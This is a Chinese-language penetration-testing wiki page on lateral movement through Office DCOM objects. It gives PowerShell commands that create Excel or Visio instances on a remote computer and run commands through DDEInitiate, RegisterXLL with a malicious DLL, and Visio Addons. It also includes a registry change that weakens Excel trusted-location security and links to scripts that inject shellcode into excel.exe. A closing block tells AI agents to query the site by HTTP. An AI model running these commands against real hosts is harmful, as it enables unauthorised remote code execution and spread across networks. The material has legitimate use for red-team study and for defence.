# 通过Office进行DCOM ``` Excel.Application DDEInitiate RegisterXLL Outlook.Application CreateObject->Shell.Application->ShellExecute CreateObject->ScriptControl (office-32bit only) Visio.InvisibleApp Addons ExecuteLine Word.Application RunAutoMacro 通过 ExecuteExcel4Macro 通过 DCOM 将 shellcode 注入 excel.exe 的 Powershell 脚本 >Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9 >Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a 使用Excel DDE PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) PS C:\> $excel.DisplayAlerts = $false PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe") 使用 Excel RegisterXLL 不能可靠地与远程目标一起使用 Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1 PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) PS> $excel.RegisterXLL("EvilXLL.dll") 使用Visio $visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName")) $visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc") ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/heng-xiang-yi-dong/dcom-exploitation/tong-guo-office-jin-xing-dcom.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.